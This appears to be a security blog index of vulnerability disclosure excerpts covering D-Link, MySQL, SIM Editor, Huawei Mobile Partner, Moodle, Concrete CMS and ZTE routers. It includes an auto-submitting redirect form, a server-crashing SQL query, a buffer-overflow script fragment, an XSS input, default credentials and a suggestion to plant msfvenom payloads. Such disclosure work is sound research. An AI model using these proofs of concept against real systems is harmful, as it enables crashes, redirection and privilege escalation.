D-Link DIR-615 Open Redirection and XSS

D-Link DIR-615
Hardware Version: E3
Firmware Version: 5.10

The ‘apply.cgi’ file was vulnerable to Open Redirection and XSS. Inside the router many other cgi files too use this functionality in ‘apply.cgi’. For example the ‘ping_response.cgi’ file.

Open Redirection


<!-- @OsandaMalith -->
    <form action="" method="POST" id="exploit">
      <input type="hidden" name="html_response_page" value="https://google.lk" />
      <input type="hidden" name="html_response_return_page" value="tools_vct.asp" />
    <img src=x onerror="exploit.submit()"/>

Continue reading


MySQL DoS in the Procedure Analyse Function – CVE-2015-4870

This is a crash I found in MySQL versions up to 5.5.45. In the function procedure analyse() I found this crash while passing a sub query.



So an Example POC would be:

select * from information_schema.tables procedure analyse((select*from(select 1)x),1);
mysql> select * from information_schema.tables procedure analyse((select*from(select 1)x),1);
ERROR 2013 (HY000): Lost connection to MySQL server during query
mysql> select 1;
ERROR 2006 (HY000): MySQL server has gone away
No connection. Trying to reconnect...
ERROR 2003 (HY000): Can't connect to MySQL server on 'localhost' (10061)
Can't connect to the server


Continue reading

Sim Editor Stack Based Buffer Overflow

Last week I bought a SIM card reader. Along with it came the software for it. It was SIM Card Editor 6.6. You can download it from here. The app is pretty cool. You can manipulate the SIM card’s data with it. However I noticed something strange in this application. When we are loading file for example suppose with 4 “A” characters we would get the output as “ªª”. Just two characters will be displayed. When I gave the input as “4141” the result would be “AA”. This time the correct output we need. What was the reason for this? From what I noticed was that when we enter “AAAA” the hex values would be “\x41\x41\x41\x41” the app will take two values each and evaluate to hex.

When we give the input as “4141” this is what happens.

So suppose we want to enter a hex string we have to just give the input. For example we want to give the application “AA” we have to give just “4141”. Taking that into consideration the rest was easy. The return address is overwritten with our buffer.

buff = "41" * 500
with open("ex.sms", 'w') as f:

Continue reading

Escalating Local Privileges Using Mobile Partner

Mobile Partner is a very popular software that ships with Huawei internet dongles. Recently I noticed the fact that the “Mobile Partner” directory and all subdirectories, files by default has full permissions granted the Users group. This means that any User in your system can plant a malicious executable and escalate privileges when the Administrator runs Mobile Partner. Why not bind the exe using msfpayload or msfvenom? 😉

 Proof of Concept

By default in my dongle I had Mobile Partner 11.302.09.00.03 and if you are using versions below you might find out that this folder and it’s contents has been granted full permissions not only to the Users group but also to Everyone which means any random user can plant anything inside this directory.

C:\Program Files (x86)>cacls "Mobile Partner"
C:\Program Files (x86)\Mobile Partner Everyone:(OI)(CI)F
                                      NT SERVICE\TrustedInstaller:(ID)F
                                      NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F

                                      NT AUTHORITY\SYSTEM:(ID)F
                                      NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(ID)F
                                      CREATOR OWNER:(OI)(CI)(IO)(ID)F
                                      APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(OI)(CI)(IO)(ID)(special access:)



C:\Program Files>cd "Mobile Partner"

C:\Program Files (x86)\Mobile Partner>cacls "Mobile Partner.exe"
C:\Program Files (x86)\Mobile Partner\Mobile Partner.exe Everyone:F
                                                         NT AUTHORITY\SYSTEM:(ID)F
                                                         APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(ID)R

Continue reading

Moodle 2.7 Persistent XSS


I hope you all have heard about the Moodle project. The full form is Moodle Modular Object-Oriented Dynamic Learning Environment. This project is a free open-source project which focuses in teaching and learning online courses effectively. Most of the universities, colleges, educational institutes use this application in interacting with students. You can read and research more information on Wikipedia.

Vulnerability and Exploit

This is a persistent XSS I found in Moodle 2.7. Well, this vulnerability was present from the version 2.4.9 till 2.7 so far hidden from the eye 😉 luckily I spotted this while I was fuzzing random stuff against the application.

Edit your user profile and under “Optional” you can see “Skype ID”. Let’s inject some HTML into the Skype ID field and check the output

“>>><h1>Hello World</h1>

It seems like our input is echoed back thrice. In one line the input is being URL encoded since it should be the URL of the user and in another it is being converted to HTML entities, while in the other field it seems like our input is being filtered out. I love to break filters. Here is my quick and small analysis in detail.

Output 1:

<a href=”skype:%22%3E%3E%3EHello+World?call”>

Output 2:

&quot;&gt;&gt;&gt;Hello World

Continue reading

Concrete Multiple XSS

While I was playing around with Concrete CMS, I wanted to know how this application shows us a hyperlink to the “Back” button. I found something interesting in the “download_file.php” file.


line 27

<form action="<?php echo  View::url('/download_file', 'submit_password', $fID) ?>" method="post">
		<?php  if(isset($force)) { ?>
			<input type="hidden" value="<?php echo  $force ?>" name="force" />
		<?php  } ?>
		<input type="hidden" value="<?php echo  $returnURL ?>" name="returnURL" />
		<input type="hidden" value="<?php echo  $rcID ?>" name="rcID"/>
		<label for="password"><?php echo t('Password')?>: <input type="password" name="password" /></label>
		<br /><br />
		<button type="submit"><?php echo t('Download')?></button>

Let’s have a look at the “$returnURL” variable. Continue reading

ZTE WXV10 W300 Multiple Vulnerabilities

Default Password Being Used (CVE-2014-4018)

In ZTE routers the username is a constant which is “admin” and the password by default is “admin”

ROM-0 Backup File Disclosure (CVE-2014-4019)

There is a rom-0 backup file contains sensitive information such as the passwords. There is a disclosure in which anyone can download that file without any authentication by a simple GET request. Continue reading